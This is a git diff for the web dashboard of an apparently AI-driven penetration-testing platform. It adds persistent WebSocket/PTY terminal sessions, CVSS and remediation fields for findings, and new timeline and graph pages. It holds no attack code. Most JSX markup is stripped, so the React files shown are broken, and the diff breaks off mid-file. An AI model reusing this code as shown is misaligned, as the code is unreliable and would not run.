diff --git a/Makefile b/Makefile index 5619b295..ef094ec4 100644 --- a/Makefile +++ b/Makefile @@ -39,7 +39,7 @@ export CLAUDE_CREDENTIALS_VOLUME ?= $(shell test -f $(HOME)/.claude/.credentials dogfood launcher smoke \ dev cli-dev web-dev infra \ quality quality-cli test test-local lint lint-fix \ - web-build web-lint web-migrate web-ee web-oss \ + web-build web-hotswap web-lint web-migrate web-ee web-oss \ status logs health clean \ node-install web-db-ensure \ benchmark recreate-litellm @@ -68,6 +68,7 @@ help: @echo "" @echo "Web dashboard (single checks):" @echo " make web-build Prisma generate + Next build" + @echo " make web-hotswap Build + inject into running container (~15s)" @echo " make web-lint ESLint" @echo " make web-migrate [NAME=] Prisma migrate dev" @echo " make web-ee / web-oss Toggle EE/OSS mode (dev-only)" @@ -196,6 +197,11 @@ quality: lint test-local quality-cli web-lint web-build web-build: node-install cd $(WEB_DIR) && npx prisma generate && npm run build +## Hot-swap web dashboard into running container (~15s vs ~5min docker build). +## Builds Next.js on host, injects via tar pipe, restarts container. +web-hotswap: node-install web-build + ./scripts/web-hotswap.sh --skip-build + web-lint: node-install cd $(WEB_DIR) && npx eslint src/ --max-warnings 0 diff --git a/benchmark/xbow-validation-benchmarks b/benchmark/xbow-validation-benchmarks index ec459276..d8e45518 160000 --- a/benchmark/xbow-validation-benchmarks +++ b/benchmark/xbow-validation-benchmarks @@ -1 +1 @@ -Subproject commit ec459276faaa9a116653afd52011983bf6b0c9aa +Subproject commit d8e455185c4cd4760f44aeecd75e1860b9606abb diff --git a/clients/web/.build-stamp b/clients/web/.build-stamp new file mode 100644 index 00000000..4afed455 --- /dev/null +++ b/clients/web/.build-stamp @@ -0,0 +1 @@ +1777825936 diff --git a/clients/web/next.config.ts b/clients/web/next.config.ts index b83b18d3..61ec2533 100644 --- a/clients/web/next.config.ts +++ b/clients/web/next.config.ts @@ -26,6 +26,13 @@ const nextConfig: NextConfig = { }, ], }, + // HTML pages: no cache so hotswap chunk name changes take effect immediately + { + source: "/:path((?!_next/static|_next/image|favicon.ico).*)", + headers: [ + { key: "Cache-Control", value: "no-cache, no-store, must-revalidate" }, + ], + }, ]; }, // Pin Turbopack workspace root to the monorepo root (where npm workspaces diff --git a/clients/web/server/terminal-server.ts b/clients/web/server/terminal-server.ts index 48c89d0b..45dae98d 100644 --- a/clients/web/server/terminal-server.ts +++ b/clients/web/server/terminal-server.ts @@ -2,16 +2,26 @@ /** * Terminal WebSocket Server — spawns Decepticon CLI in a PTY. * - * Creates a LangGraph thread on connection (if none exists) and shares it - * with both the CLI process (via env var) and the web client (via JSON message). - * This ensures both surfaces observe the same execution. + * Session-persistent architecture: + * PTY processes are keyed by engagement slug + agent ID and survive + * WebSocket disconnects. When the browser reconnects (tab refresh, + * network blip, hotswap), it reattaches to the SAME PTY — no new + * CLI banner, no lost state, no [Reconnecting...] spam. + * + * PTYs are only destroyed when: + * 1. The CLI process itself exits (user typed Ctrl+C, engagement finished) + * 2. No WebSocket reconnects within ORPHAN_TTL (60s) after disconnect + * 3. The terminal server shuts down (SIGTERM) * * Protocol (Server → Client): - * - JSON { type: "threadId", threadId: "..." } — thread ID for web to store - * - Raw text — PTY stdout/stderr for xterm.js + * - JSON { type: "threadId", threadId: "..." } + * - JSON { type: "pong" } + * - JSON { type: "reattached", scrollback: "..." } — sent on reattach with recent output + * - Raw text — PTY stdout/stderr * * Protocol (Client → Server): - * - JSON { type: "resize", cols, rows } — terminal resize + * - JSON { type: "resize", cols, rows } + * - JSON { type: "ping" } * - Raw text — stdin for PTY */ @@ -27,45 +37,95 @@ const PORT = parseInt(process.env.TERMINAL_PORT ?? "3003", 10); const WEB_PORT = process.env.WEB_PORT ?? "3000"; const CLI_PATH = resolve(__dirname, "../../cli/src/index.tsx"); const LANGGRAPH_API_URL = process.env.LANGGRAPH_API_URL ?? "http://localhost:2024"; +const ORPHAN_TTL = 60_000; // Kill orphaned PTYs after 60s with no WS +const SCROLLBACK_LIMIT = 50_000; // chars of recent output to buffer for reattach + const ALLOWED_ORIGINS = new Set( (process.env.TERMINAL_ALLOWED_ORIGINS ?? `http://localhost:${WEB_PORT},http://127.0.0.1:${WEB_PORT}`) .split(",") - .map((origin) => origin.trim()) + .map((o) => o.trim()) .filter(Boolean), ); const wss = new WebSocketServer({ port: PORT }); - console.log(`[terminal-server] Listening on ws://localhost:${PORT}`); -console.log(`[terminal-server] CLI path: ${CLI_PATH}`); -console.log(`[terminal-server] LangGraph API: ${LANGGRAPH_API_URL}`); + +// ── Session Pool ───────────────────────────────────────────────── + +interface Session { + key: string; + term: pty.IPty; + ws: WebSocket | null; // currently-attached WS (null = orphaned) + scrollback: string; // ring buffer of recent output + threadId: string; + orphanTimer: ReturnType | null; + dead: boolean; // PTY exited + exitCode: number | null; +} + +const sessions = new Map(); + +function sessionKey(slug: string, agentId: string): string { + return `${slug}:${agentId}`; +} + +function appendScrollback(session: Session, data: string): void { + session.scrollback += data; + if (session.scrollback.length > SCROLLBACK_LIMIT) { + session.scrollback = session.scrollback.slice(-SCROLLBACK_LIMIT); + } +} + +function destroySession(key: string): void { + const session = sessions.get(key); + if (!session) return; + if (session.orphanTimer) clearTimeout(session.orphanTimer); + if (!session.dead) { + try { session.term.kill(); } catch { /* already dead */ } + } + sessions.delete(key); + console.log(`[terminal-server] Session ${key} destroyed`); +} + +// ── Helpers ────────────────────────────────────────────────────── function isAllowedOrigin(origin: string | undefined): boolean { if (!origin) return false; + try { return ALLOWED_ORIGINS.has(new URL(origin).origin); } catch { return false; } +} + +async function createThread(engagementId: string, agentId: string): Promise { + const controller = new AbortController(); + const timer = setTimeout(() => controller.abort(), 10000); try { - return ALLOWED_ORIGINS.has(new URL(origin).origin); - } catch { - return false; + const res = await fetch(`${LANGGRAPH_API_URL}/threads`, { + method: "POST", + headers: { "Content-Type": "application/json" }, + body: JSON.stringify({ metadata: { engagement_id: engagementId, decepticon_assistant: agentId } }), + signal: controller.signal, + }); + if (!res.ok) throw new Error(`Thread create: ${res.status}`); + return ((await res.json()) as { thread_id: string }).thread_id; + } finally { + clearTimeout(timer); } } -/** Create a new LangGraph thread via the REST API. */ -async function createThread(engagementId: string, agentId: string): Promise { - const res = await fetch(`${LANGGRAPH_API_URL}/threads`, { - method: "POST", +function sendJson(ws: WebSocket, payload: Record): void { + if (ws.readyState === WebSocket.OPEN) ws.send(JSON.stringify(payload)); +} + +function persistThreadId(engagementId: string, threadId: string): void { + const webUrl = `http://localhost:${process.env.PORT ?? 3000}`; + fetch(`${webUrl}/api/engagements/${engagementId}`, { + method: "PATCH", headers: { "Content-Type": "application/json" }, - body: JSON.stringify({ - metadata: { - engagement_id: engagementId, - assistant_id: agentId, - }, - }), - }); - if (!res.ok) throw new Error(`Failed to create thread: ${res.status}`); - const data = await res.json() as { thread_id: string }; - return data.thread_id; + body: JSON.stringify({ threadId }), + }).catch(() => {}); } +// ── Connection Handler ─────────────────────────────────────────── + wss.on("connection", async (ws: WebSocket, req) => { if (!isAllowedOrigin(req.headers.origin)) { ws.close(1008, "Origin not allowed"); @@ -74,97 +134,214 @@ wss.on("connection", async (ws: WebSocket, req) => { const url = new URL(req.url ?? "/", `http://localhost:${PORT}`); const engagementId = url.searchParams.get("engagementId") ?? ""; - // engagementSlug is the folder name under ~/.decepticon/workspace/. - // It identifies the engagement directory the CLI will operate inside; - // engagementId is the DB record cuid passed to LangGraph thread metadata. const engagementSlug = url.searchParams.get("engagementSlug") ?? ""; const agentId = url.searchParams.get("agentId") ?? "soundwave"; - let threadId = url.searchParams.get("threadId") ?? ""; + if (!engagementSlug) { + ws.close(1008, "Missing engagementSlug"); + return; + } + + const key = sessionKey(engagementSlug, agentId); + let session = sessions.get(key); + + // ── Reattach to existing session ── + if (session && !session.dead) { + console.log(`[terminal-server] Reattaching WS to existing session: ${key} (pid=${session.term.pid})`); + + // Cancel orphan timer + if (session.orphanTimer) { + clearTimeout(session.orphanTimer); + session.orphanTimer = null; + } + + // Detach old WS if any + if (session.ws && session.ws !== ws && session.ws.readyState === WebSocket.OPEN) { + session.ws.close(1000, "Replaced by new connection"); + } + session.ws = ws; + + // Send threadId + if (session.threadId) sendJson(ws, { type: "threadId", threadId: session.threadId }); + + // Send scrollback so the client sees recent output without a full re-render + if (session.scrollback) { + sendJson(ws, { type: "reattached" }); + ws.send(session.scrollback); + } + + wireWsToSession(ws, session); + return; + } + + // ── Clean up dead session ── + if (session?.dead) { + destroySession(key); + session = undefined; + } + + // ── Create new session ── + let threadId = url.searchParams.get("threadId") ?? ""; if (!threadId) { try { threadId = await createThread(engagementId, agentId); - console.log(`[terminal-server] Created new thread: ${threadId}`); + console.log(`[terminal-server] Created thread: ${threadId}`); } catch (err) { - console.error(`[terminal-server] Failed to create thread:`, err); + const msg = err instanceof Error ? err.message : String(err); + console.error(`[terminal-server] Thread creation failed: ${msg}`); + sendJson(ws, { type: "error", message: `Thread creation failed: ${msg}` }); } } - - if (threadId && ws.readyState === WebSocket.OPEN) { - ws.send(JSON.stringify({ type: "threadId", threadId })); + if (threadId) { + sendJson(ws, { type: "threadId", threadId }); + if (engagementId) persistThreadId(engagementId, threadId); } - console.log( - `[terminal-server] Connection: engagement=${engagementId} slug=${engagementSlug} agent=${agentId} thread=${threadId}`, - ); - const env: Record = { ...process.env as Record, TERM: "xterm-256color", FORCE_COLOR: "1", - // Names align with the CLI's expectations (clients/cli/src/hooks/useAgent.ts): - // DECEPTICON_ASSISTANT_ID picks the LangGraph assistant; DECEPTICON_ENGAGEMENT - // is the folder slug used for system-level logging and the engagement_ready - // handoff. Internal Docker hostname for the LangGraph endpoint is forwarded - // explicitly so the CLI subprocess does not fall back to localhost. DECEPTICON_ASSISTANT_ID: agentId, DECEPTICON_ENGAGEMENT: engagementSlug, DECEPTICON_WORKSPACE_PATH: engagementSlug ? `/workspace/${engagementSlug}` : "/workspace", DECEPTICON_API_URL: LANGGRAPH_API_URL, }; - if (threadId) { - env.DECEPTICON_THREAD_ID = threadId; - } + if (threadId) env.DECEPTICON_THREAD_ID = threadId; - const term = pty.spawn("node", ["--import", "tsx/esm", CLI_PATH], { - name: "xterm-256color", - cols: 120, - rows: 30, - cwd: resolve(__dirname, "../.."), - env, - }); + let term: pty.IPty; + try { + term = pty.spawn("node", ["--import", "tsx/esm", CLI_PATH], { + name: "xterm-256color", + cols: 120, + rows: 30, + cwd: resolve(__dirname, "../.."), + env, + }); + console.log(`[terminal-server] PTY spawned: ${key} pid=${term.pid}`); + } catch (err) { + const msg = err instanceof Error ? err.message : String(err); + console.error(`[terminal-server] PTY spawn failed: ${msg}`); + if (ws.readyState === WebSocket.OPEN) { + ws.send(`\r\n\x1b[31m[Error: ${msg}]\x1b[0m\r\n`); + } + ws.close(1011, "PTY spawn failed"); + return; + } - console.log(`[terminal-server] PTY spawned: pid=${term.pid}`); + const newSession: Session = { + key, + term, + ws, + scrollback: "", + threadId, + orphanTimer: null, + dead: false, + exitCode: null, + }; + sessions.set(key, newSession); + // PTY → buffer + current WS term.onData((data: string) => { - if (ws.readyState === WebSocket.OPEN) { - ws.send(data); + appendScrollback(newSession, data); + if (newSession.ws?.readyState === WebSocket.OPEN) { + newSession.ws.send(data); } }); - term.onExit(({ exitCode }) => { - console.log(`[terminal-server] PTY exited: pid=${term.pid} code=${exitCode}`); - if (ws.readyState === WebSocket.OPEN) { - ws.send(`\r\n[Process exited with code ${exitCode}]\r\n`); - ws.close(); + // PTY exit + term.onExit(({ exitCode, signal }) => { + console.log(`[terminal-server] PTY exited: ${key} pid=${term.pid} code=${exitCode} signal=${signal}`); + newSession.dead = true; + newSession.exitCode = exitCode; + if (newSession.ws?.readyState === WebSocket.OPEN) { + if (exitCode === 0) { + newSession.ws.send(`\r\n\x1b[32m[Session completed]\x1b[0m\r\n`); + } else { + newSession.ws.send(`\r\n\x1b[33m[Process exited: code ${exitCode}${signal ? `, signal ${signal}` : ""}]\x1b[0m\r\n`); + } + newSession.ws.close(1000, "PTY exited"); } + // Don't destroy immediately — let reattach see the exit message + setTimeout(() => destroySession(key), 5000); }); + wireWsToSession(ws, newSession); +}); + +// ── Wire a WebSocket to a Session ──────────────────────────────── + +function wireWsToSession(ws: WebSocket, session: Session): void { + // Send initial resize + ws.once("message", () => {}); // absorb first resize if needed + ws.on("message", (raw: Buffer | string) => { const msg = raw.toString(); try { const parsed = JSON.parse(msg); + if (parsed.type === "ping") { + sendJson(ws, { type: "pong" }); + return; + } if (parsed.type === "resize" && parsed.cols && parsed.rows) { - term.resize(parsed.cols, parsed.rows); + try { + session.term.resize( + Math.max(1, Math.min(500, parsed.cols)), + Math.max(1, Math.min(200, parsed.rows)), + ); + } catch { /* PTY may have exited */ } return; } } catch { // Not JSON — raw stdin } - term.write(msg); + if (!session.dead) { + try { session.term.write(msg); } catch { /* PTY exited */ } + } }); ws.on("close", () => { - console.log(`[terminal-server] Connection closed, killing PTY pid=${term.pid}`); - term.kill(); + console.log(`[terminal-server] WS disconnected from session ${session.key}`); + if (session.ws === ws) { + session.ws = null; + // Don't kill PTY — start orphan timer instead + if (!session.dead) { + session.orphanTimer = setTimeout(() => { + if (!session.ws && !session.dead) { + console.log(`[terminal-server] Orphan TTL expired for ${session.key} — destroying`); + destroySession(session.key); + } + }, ORPHAN_TTL); + } + } }); ws.on("error", (err) => { - console.error(`[terminal-server] WebSocket error:`, err.message); - term.kill(); + console.error(`[terminal-server] WS error on ${session.key}: ${err.message}`); + // Don't kill PTY — let the close handler start orphan timer }); -}); +} + +// ── Server lifecycle ───────────────────────────────────────────── wss.on("error", (err) => { - console.error(`[terminal-server] Server error:`, err.message); + console.error(`[terminal-server] Server error: ${err.message}`); +}); + +function shutdown() { + console.log(`[terminal-server] Shutting down, destroying ${sessions.size} sessions...`); + for (const key of [...sessions.keys()]) destroySession(key); + wss.close(); + process.exit(0); +} + +process.on("SIGTERM", shutdown); +process.on("SIGINT", shutdown); + +process.on("uncaughtException", (err) => { + console.error(`[terminal-server] Uncaught: ${err.message}`); + console.error(err.stack); +}); + +process.on("unhandledRejection", (reason) => { + console.error(`[terminal-server] Unhandled rejection:`, reason); }); diff --git a/clients/web/src/app/(dashboard)/engagements/[id]/findings/page.tsx b/clients/web/src/app/(dashboard)/engagements/[id]/findings/page.tsx index e39189e0..2ed9f6ef 100644 --- a/clients/web/src/app/(dashboard)/engagements/[id]/findings/page.tsx +++ b/clients/web/src/app/(dashboard)/engagements/[id]/findings/page.tsx @@ -30,6 +30,11 @@ interface Finding { evidence: string; attackVector: string; affectedAssets: string[]; + cvssScore?: number; + cvssVector?: string; + cwe?: string[]; + mitre?: string[]; + remediation?: string; } const severityColors: Record = { @@ -105,7 +110,7 @@ export default function FindingsPage() {

{selectedFinding.title}

-
+
{selectedFinding.id} @@ -115,9 +120,27 @@ export default function FindingsPage() { > {selectedFinding.severity} + {selectedFinding.cvssScore != null && ( + + CVSS {selectedFinding.cvssScore.toFixed(1)} + + )} + {selectedFinding.cwe?.map((c) => ( + {c} + ))} + {selectedFinding.mitre?.map((m) => ( + {m} + ))}
+ {selectedFinding.cvssVector && ( +
+ CVSS Vector +

{selectedFinding.cvssVector}

+
+ )} +
@@ -171,6 +194,19 @@ export default function FindingsPage() { )} + + {selectedFinding.remediation && ( + + + Remediation + + +

+ {selectedFinding.remediation} +

+
+
+ )}
); @@ -222,6 +258,7 @@ export default function FindingsPage() { ID Title Severity + CVSS Assets @@ -246,6 +283,9 @@ export default function FindingsPage() { {finding.severity} + + {finding.cvssScore != null ? finding.cvssScore.toFixed(1) : "—"} + {finding.affectedAssets.length > 0 ? finding.affectedAssets.join(", ") diff --git a/clients/web/src/app/(dashboard)/engagements/[id]/layout.tsx b/clients/web/src/app/(dashboard)/engagements/[id]/layout.tsx index 851db22d..0ae95225 100644 --- a/clients/web/src/app/(dashboard)/engagements/[id]/layout.tsx +++ b/clients/web/src/app/(dashboard)/engagements/[id]/layout.tsx @@ -1,55 +1,96 @@ "use client"; -import { useEffect, useState } from "react"; -import { useParams } from "next/navigation"; -import { Skeleton } from "@/components/ui/skeleton"; +import { useState, useEffect } from "react"; +import { useParams, usePathname } from "next/navigation"; +import { EngagementProvider } from "@/lib/engagement-context"; +import { useRunObserver } from "@/hooks/useRunObserver"; +import { WebTerminal } from "@/components/terminal/web-terminal"; +import { cn } from "@/lib/utils"; -interface Engagement { - id: string; - name: string; +const REQUIRED_PLAN_DOCS = ["roe", "conops", "deconfliction"] as const; + +function pickAssistant(planDocs: Record): "soundwave" | "decepticon" { + for (const name of REQUIRED_PLAN_DOCS) { + if (planDocs[name] == null) return "soundwave"; + } + return "decepticon"; } -export default function EngagementLayout({ children }: { children: React.ReactNode }) { +export default function EngagementLayout({ + children, +}: { + children: React.ReactNode; +}) { const params = useParams(); - const id = params.id as string; - const [engagement, setEngagement] = useState(null); - const [loading, setLoading] = useState(true); + const pathname = usePathname(); + const engagementId = params.id as string; + const [engagement, setEngagement] = useState<{ name: string } | null>(null); + const [agentId, setAgentId] = useState<"soundwave" | "decepticon" | null>(null); + const [threadId, setThreadId] = useState(null); + + // Resolve engagement metadata — determines agentId and slug for WS useEffect(() => { - let active = true; - fetch(`/api/engagements/${id}`) - .then((res) => { - if (!res.ok) throw new Error("fetch failed"); - return res.json(); - }) - .then((data: Engagement) => { - if (!active) return; - setEngagement(data); - }) - .catch(() => { - if (!active) return; - setEngagement(null); - }) - .finally(() => { - if (!active) return; - setLoading(false); - }); - return () => { - active = false; + let cancelled = false; + const load = async () => { + try { + const [engRes, planRes] = await Promise.all([ + fetch(`/api/engagements/${engagementId}`), + fetch(`/api/engagements/${engagementId}/plan-docs`), + ]); + if (!engRes.ok) return; + const eng = (await engRes.json()) as { name: string }; + const planDocs = planRes.ok ? ((await planRes.json()) as Record) : {}; + if (cancelled) return; + setEngagement(eng); + setAgentId(pickAssistant(planDocs)); + } catch (err) { + console.error("[EngagementLayout] Failed to resolve engagement:", err); + } }; - }, [id]); + load(); + return () => { cancelled = true; }; + }, [engagementId]); - if (loading) { - return ( -
- -
- ); - } + // Persistent observer — survives tab navigation + const { events, isRunning, activeRunId } = useRunObserver({ threadId }); - if (!engagement) { - return
Engagement not found
; - } + const isLivePath = pathname.endsWith("/live"); - return <>{children}; + // Don't render terminal until we know the slug and assistant + const terminalReady = engagement != null && agentId != null; + + return ( + +
+
+ {children} +
+ {/* Terminal: always mounted, visibility controlled by route */} +
+ {terminalReady && ( + + )} +
+
+
+ ); } diff --git a/clients/web/src/app/(dashboard)/engagements/[id]/live/page.tsx b/clients/web/src/app/(dashboard)/engagements/[id]/live/page.tsx index 13e85c82..0d808a89 100644 --- a/clients/web/src/app/(dashboard)/engagements/[id]/live/page.tsx +++ b/clients/web/src/app/(dashboard)/engagements/[id]/live/page.tsx @@ -1,33 +1,14 @@ "use client"; -import { useState, useCallback, useEffect } from "react"; +import { useState, useCallback } from "react"; import { useParams } from "next/navigation"; import type { AgentConfig } from "@/lib/agents"; import { AgentGraphCanvas } from "@/components/agents/agent-graph-canvas"; -import { WebTerminal } from "@/components/terminal/web-terminal"; -import { useRunObserver } from "@/hooks/useRunObserver"; +import { useEngagementContext } from "@/lib/engagement-context"; import { useAgents } from "@/hooks/useAgents"; - -interface EngagementMeta { - name: string; -} - -const REQUIRED_PLAN_DOCS = ["roe", "conops", "deconfliction"] as const; - -/** Decide which assistant the CLI should connect to. - * - * The launcher's engagement.Select makes the same choice for the CLI: an - * engagement with all three planning docs is "ready" and routes to - * decepticon; anything missing means soundwave still has an interview to - * run. plan-docs is the source of truth — engagement.status drifts when - * the operator switches between web and CLI. - */ -function pickAssistant(planDocs: Record): "soundwave" | "decepticon" { - for (const name of REQUIRED_PLAN_DOCS) { - if (planDocs[name] == null) return "soundwave"; - } - return "decepticon"; -} +import { LiveActivityFeed } from "@/components/streaming/live-activity-feed"; +import { OpplanLiveOverlay } from "@/components/streaming/opplan-live-overlay"; +import { AgentDetailPanel } from "@/components/streaming/agent-detail-panel"; export default function LivePage() { const params = useParams(); @@ -35,40 +16,10 @@ export default function LivePage() { const { agents } = useAgents(); const [selectedAgent, setSelectedAgent] = useState(null); - const [threadId, setThreadId] = useState(null); - const [engagement, setEngagement] = useState(null); - const [agentId, setAgentId] = useState<"soundwave" | "decepticon" | null>(null); - - // Resolve the slug + assistant before mounting the terminal. Mounting it - // earlier would spawn the PTY with wrong env (defaulting to soundwave with - // an empty slug), forcing a reconnect once the data lands. - useEffect(() => { - let cancelled = false; - const load = async () => { - try { - const [engRes, planRes] = await Promise.all([ - fetch(`/api/engagements/${engagementId}`), - fetch(`/api/engagements/${engagementId}/plan-docs`), - ]); - if (!engRes.ok) return; - const eng = (await engRes.json()) as EngagementMeta; - const planDocs = planRes.ok ? ((await planRes.json()) as Record) : {}; - if (cancelled) return; - setEngagement(eng); - setAgentId(pickAssistant(planDocs)); - } catch (err) { - console.error("[LivePage] Failed to resolve engagement:", err); - } - }; - load(); - return () => { cancelled = true; }; - }, [engagementId]); - - const { events } = useRunObserver({ threadId }); - const handleThreadId = useCallback((tid: string) => { - setThreadId(tid); - }, []); + // Observer + terminal are managed by the engagement layout — they persist + // across tab switches so events and PTY connection survive navigation. + const { events } = useEngagementContext(); function handleAgentClick(agent: AgentConfig) { setSelectedAgent( @@ -78,32 +29,35 @@ export default function LivePage() { return (
- {/* Left: Agent Execution Graph */} -
+ {/* Left: Activity Feed */} +
+ + {selectedAgent && ( +
+ setSelectedAgent(null)} + /> +
+ )} +
+ + {/* Center: Agent Execution Graph + OPPLAN overlay */} +
+
+ +
- {/* Right: CLI Terminal */} -
- {engagement && agentId ? ( - - ) : ( -
- Loading engagement… -
- )} -
+ {/* Right column (terminal) is rendered by the engagement layout. + It persists across tab switches — no more reset on navigation. */}
); } diff --git a/clients/web/src/app/(dashboard)/engagements/[id]/page.tsx b/clients/web/src/app/(dashboard)/engagements/[id]/page.tsx index 42abc649..68e45265 100644 --- a/clients/web/src/app/(dashboard)/engagements/[id]/page.tsx +++ b/clients/web/src/app/(dashboard)/engagements/[id]/page.tsx @@ -4,78 +4,137 @@ import { useEffect, useState } from "react"; import { useParams, useRouter } from "next/navigation"; import Link from "next/link"; import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card"; -import { FileWarning, Network, Play, ArrowRight, ClipboardList, Loader2 } from "lucide-react"; - -const quickStats = [ - { - label: "Objectives", - value: 0, - subValue: "0 completed", - icon: ClipboardList, - href: "plan", - color: "text-emerald-400", - }, - { - label: "Findings", - value: 0, - subValue: "0 critical", - icon: FileWarning, - href: "findings", - color: "text-red-400", - }, -]; +import { Badge } from "@/components/ui/badge"; +import { Skeleton } from "@/components/ui/skeleton"; +import { FileWarning, Network, Play, ArrowRight, ClipboardList, Loader2, Download, Clock } from "lucide-react"; + +interface Objective { + id: string; + title: string; + status: string; + phase: string; +} + +interface Finding { + id: string; + title: string; + severity: string; +} + +const severityBadge: Record = { + critical: "bg-red-500/20 text-red-300", + high: "bg-orange-500/20 text-orange-300", + medium: "bg-yellow-500/20 text-yellow-300", + low: "bg-blue-500/20 text-blue-300", + informational: "bg-slate-500/20 text-slate-300", +}; export default function EngagementOverviewPage() { const params = useParams(); const router = useRouter(); const id = params.id as string; const [loading, setLoading] = useState(true); + const [objectives, setObjectives] = useState([]); + const [findings, setFindings] = useState([]); + const [graphNodeCount, setGraphNodeCount] = useState(0); - // Check if engagement has documents — if not, redirect to Live for Soundwave interview useEffect(() => { let active = true; - async function checkDocs() { + async function load() { try { - const res = await fetch(`/api/engagements/${id}/opplan`); + // Check if opplan exists first + const opplanRes = await fetch(`/api/engagements/${id}/opplan`); if (!active) return; - if (!res.ok) { + if (!opplanRes.ok) { router.replace(`/engagements/${id}/live?new=true`); return; } - const data = await res.json(); + const opplanData = await opplanRes.json(); if (!active) return; - // If opplan has no objectives, documents haven't been created yet - if (!data.objectives || data.objectives.length === 0) { + const objs: Objective[] = opplanData.objectives ?? []; + if (objs.length === 0) { router.replace(`/engagements/${id}/live?new=true`); return; } - } catch { + setObjectives(objs); + + // Fetch findings and graph in parallel + const [findingsRes, graphRes] = await Promise.all([ + fetch(`/api/engagements/${id}/findings`).catch(() => null), + fetch(`/api/engagements/${id}/graph`).catch(() => null), + ]); + if (!active) return; - router.replace(`/engagements/${id}/live?new=true`); + + if (findingsRes?.ok) { + const f: Finding[] = await findingsRes.json(); + setFindings(f); + } + + if (graphRes?.ok) { + const g = await graphRes.json(); + setGraphNodeCount(g.nodes?.length ?? 0); + } + } catch { + if (active) router.replace(`/engagements/${id}/live?new=true`); return; } - if (!active) return; - setLoading(false); + if (active) setLoading(false); } - checkDocs(); - return () => { - active = false; - }; + load(); + return () => { active = false; }; }, [id, router]); if (loading) { return ( -
- +
+
+ {[1, 2, 3, 4].map((i) => ( + + ))} +
); } + const completedCount = objectives.filter((o) => o.status === "completed").length; + const blockedCount = objectives.filter((o) => o.status === "blocked").length; + const totalObj = objectives.length; + const progress = totalObj > 0 ? Math.round(((completedCount + blockedCount) / totalObj) * 100) : 0; + const criticalFindings = findings.filter((f) => f.severity === "critical").length; + + const stats = [ + { + label: "Objectives", + value: totalObj, + subValue: `${completedCount} completed`, + icon: ClipboardList, + href: "plan", + color: "text-emerald-400", + }, + { + label: "Findings", + value: findings.length, + subValue: `${criticalFindings} critical`, + icon: FileWarning, + href: "findings", + color: "text-red-400", + }, + { + label: "Attack Graph", + value: graphNodeCount, + subValue: "nodes discovered", + icon: Network, + href: "graph", + color: "text-cyan-400", + }, + ]; + return (
{/* Stats grid */}
- {quickStats.map((stat) => ( + {stats.map((stat) => ( @@ -97,26 +156,7 @@ export default function EngagementOverviewPage() { ))} - - - - - Attack Graph - - - - -
-
- 0 -

nodes discovered

-
- -
-
-
- - + {/* Progress card */} @@ -126,25 +166,64 @@ export default function EngagementOverviewPage() {
- 0% + {progress}%
-
+
-

Run engagement to see data

+

+ {completedCount}/{totalObj} objectives resolved +

- {/* Recent activity */} + {/* Quick actions */} + + + {/* Recent findings */} - + Recent Findings + {findings.length > 0 && ( + + View all + + )} -
- Run engagement to see data -
+ {findings.length === 0 ? ( +
+ No findings yet — run the engagement to discover vulnerabilities +
+ ) : ( +
+ {findings.slice(-5).reverse().map((f) => ( +
+
+ {f.title} + {f.id} +
+ + {f.severity} + +
+ ))} +
+ )}
diff --git a/clients/web/src/app/(dashboard)/engagements/[id]/timeline/page.tsx b/clients/web/src/app/(dashboard)/engagements/[id]/timeline/page.tsx new file mode 100644 index 00000000..77d02152 --- /dev/null +++ b/clients/web/src/app/(dashboard)/engagements/[id]/timeline/page.tsx @@ -0,0 +1,113 @@ +"use client"; + +import { useEffect, useState } from "react"; +import { useParams } from "next/navigation"; +import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card"; +import { Badge } from "@/components/ui/badge"; +import { Skeleton } from "@/components/ui/skeleton"; +import { ScrollArea } from "@/components/ui/scroll-area"; +import { ClipboardList, FileWarning, FolderOpen, Clock, Loader2, Download } from "lucide-react"; +import { cn } from "@/lib/utils"; + +interface TimelineEvent { + timestamp: string; + type: "plan_created" | "objective_changed" | "finding_discovered" | "file_created"; + title: string; + detail: string; + severity?: string; +} + +const typeConfig: Record = { + plan_created: { icon: ClipboardList, color: "text-violet-400", bg: "bg-violet-500/10" }, + objective_changed: { icon: ClipboardList, color: "text-amber-400", bg: "bg-amber-500/10" }, + finding_discovered: { icon: FileWarning, color: "text-red-400", bg: "bg-red-500/10" }, + file_created: { icon: FolderOpen, color: "text-cyan-400", bg: "bg-cyan-500/10" }, +}; + +const sevColor: Record = { + critical: "bg-red-500/20 text-red-300", + high: "bg-orange-500/20 text-orange-300", + medium: "bg-yellow-500/20 text-yellow-300", + low: "bg-blue-500/20 text-blue-300", +}; + +export default function TimelinePage() { + const params = useParams(); + const id = params.id as string; + const [events, setEvents] = useState([]); + const [loading, setLoading] = useState(true); + + useEffect(() => { + fetch(`/api/engagements/${id}/timeline`) + .then((r) => r.json()) + .then((data) => setEvents(data)) + .catch(() => {}) + .finally(() => setLoading(false)); + }, [id]); + + if (loading) { + return ( +
+ + {[1, 2, 3, 4].map((i) => )} +
+ ); + } + + return ( +
+
+
+

Timeline

+

{events.length} events

+
+ + Export JSON + +
+ + + + +
+ {events.length === 0 ? ( +
+ No activity recorded yet +
+ ) : ( + events.map((event, i) => { + const cfg = typeConfig[event.type] ?? typeConfig.file_created; + const Icon = cfg.icon; + return ( +
+
+ +
+
+
+ {event.title} + {event.severity && ( + + {event.severity} + + )} +
+

{event.detail}

+
+ +
+ ); + }) + )} +
+
+
+
+
+ ); +} diff --git a/clients/web/src/app/(dashboard)/graph/page.tsx b/clients/web/src/app/(dashboard)/graph/page.tsx index b51a87a6..d34bd77c 100644 --- a/clients/web/src/app/(dashboard)/graph/page.tsx +++ b/clients/web/src/app/(dashboard)/graph/page.tsx @@ -1,56 +1,76 @@ "use client"; -import { useState } from "react"; -import { Input } from "@/components/ui/input"; -import { Label } from "@/components/ui/label"; -import { Button } from "@/components/ui/button"; +import { useState, useEffect } from "react"; import { Card, CardContent } from "@/components/ui/card"; -import { Network } from "lucide-react"; +import { Network, Loader2 } from "lucide-react"; import { AttackGraphCanvas } from "@/components/graph/attack-graph-canvas"; +interface Engagement { + id: string; + name: string; + status: string; +} + export default function GraphPage() { - const [engagementId, setEngagementId] = useState(""); - const [activeId, setActiveId] = useState(null); + const [engagements, setEngagements] = useState([]); + const [selectedId, setSelectedId] = useState(null); + const [loading, setLoading] = useState(true); - return ( -
-
-

Attack Graph

-

- Visualize attack paths and knowledge graph from Neo4j -

